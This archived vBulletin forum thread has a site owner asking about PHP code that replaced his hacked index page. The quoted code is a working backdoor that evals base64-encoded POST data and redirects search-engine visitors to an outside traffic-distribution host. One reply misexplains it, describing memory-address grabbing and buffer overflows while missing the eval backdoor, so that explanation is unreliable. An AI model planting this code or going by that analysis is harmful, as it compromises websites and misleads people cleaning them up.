vb.org Archive - problem on a non vb website

vb.org Archive (https://vborg.vbsupport.ru/index.php)

- vB3 Programming Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=15)

- - problem on a non vb website - advice please (https://vborg.vbsupport.ru/showthread.php?t=209282)

problem on a non vb website - advice please

hi there i wonder if someone could help with a non vb problem i've got.

yesterday i noticed i had a problem with a website i made, the index page wasnt showing up and upon further inspection i found that it had been replaced with another that contained this:

PHP Code:


		
			
<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return  false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://uniqtds2.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://uniqtds2.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}} ?>

i've reuploaded my original page but was wondering what this piece of php is all about if someone could explain what it is i'd appreciate it

-thanks very much
-dave

lol that's cute.

You either got hacked or your host restored a backup incorrectly and gave you someone else's phishing website. What this script does is it redirects a person to a website giving them all of your server information.

It grabs the memory address of the post variable on your server (this is so they can perform a buffer overflow attack on you later), then it checks the hacker's website to see if your server's IP address has already been added to his database. Finally it relies on someone finding your website through a search engine, if someone finds your site on google or yahoo (and clicks on it) then they are redirected to the hacker's website instead of yours. The website mentioned is known for a windows verification scam, I believe they were trying to get serial numbers for windows vista or XP.

You should probably figure out a way of cleaning input on that site, that way this doesn't happen again.

thanks for the advice, its the second problem i've had like this in a month from this hosting, which really is the last straw so i'm cancelling it

thanks again

- dave

Don't be so quick to blame the host. It's usually a security flaw in one of your website scripts. You should be sure that if you're running customized code, you have some method of input cleaning when dealing with post variables.

Is that an actual file that had been replaced?

yes my index page had been completely replaced, i dont run any web scripts on the sites i host with that hosting company, its just 4 plain html websites, which is what i was so concerned about

X vBulletin 3.8.12 by vBS Debug Information
Template Usage: (1)ad_footer_end (1)ad_footer_start (1)ad_header_end (1)ad_header_logo (1)ad_navbar_below (1)bbcode_php_printable (1)footer (1)gobutton (1)header (1)headinclude (6)option (1)post_thanks_navbar_search (1)printthread (6)printthreadbit (1)spacer_close (1)spacer_open Phrase Groups Available: global postbit showthread	Included Files: ./printthread.php ./global.php ./includes/init.php ./includes/class_core.php ./includes/config.php ./includes/functions.php ./includes/class_hook.php ./includes/modsystem_functions.php ./includes/class_bbcode_alt.php ./includes/class_bbcode.php ./includes/functions_bigthree.php Hooks Called: init_startup init_startup_session_setup_start init_startup_session_setup_complete cache_permissions fetch_threadinfo_query fetch_threadinfo fetch_foruminfo style_fetch cache_templates global_start parse_templates global_setup_complete printthread_start bbcode_fetch_tags bbcode_create bbcode_parse_start bbcode_parse_complete_precache bbcode_parse_complete printthread_post printthread_complete
Messages:

Phrase Groups Available:

X vBulletin 3.8.12 by vBS Debug Information
Page Generation 0.01649 seconds Memory Usage 1,729KB Queries Executed 10 (?)
More Information
Template Usage: (1)ad_footer_end (1)ad_footer_start (1)ad_header_end (1)ad_header_logo (1)ad_navbar_below (1)bbcode_php_printable (1)footer (1)gobutton (1)header (1)headinclude (6)option (1)post_thanks_navbar_search (1)printthread (6)printthreadbit (1)spacer_close (1)spacer_open Phrase Groups Available: global postbit showthread	Included Files: ./printthread.php ./global.php ./includes/init.php ./includes/class_core.php ./includes/config.php ./includes/functions.php ./includes/class_hook.php ./includes/modsystem_functions.php ./includes/class_bbcode_alt.php ./includes/class_bbcode.php ./includes/functions_bigthree.php Hooks Called: init_startup init_startup_session_setup_start init_startup_session_setup_complete cache_permissions fetch_threadinfo_query fetch_threadinfo fetch_foruminfo style_fetch cache_templates global_start parse_templates global_setup_complete printthread_start bbcode_fetch_tags bbcode_create bbcode_parse_start bbcode_parse_complete_precache bbcode_parse_complete printthread_post printthread_complete
Messages: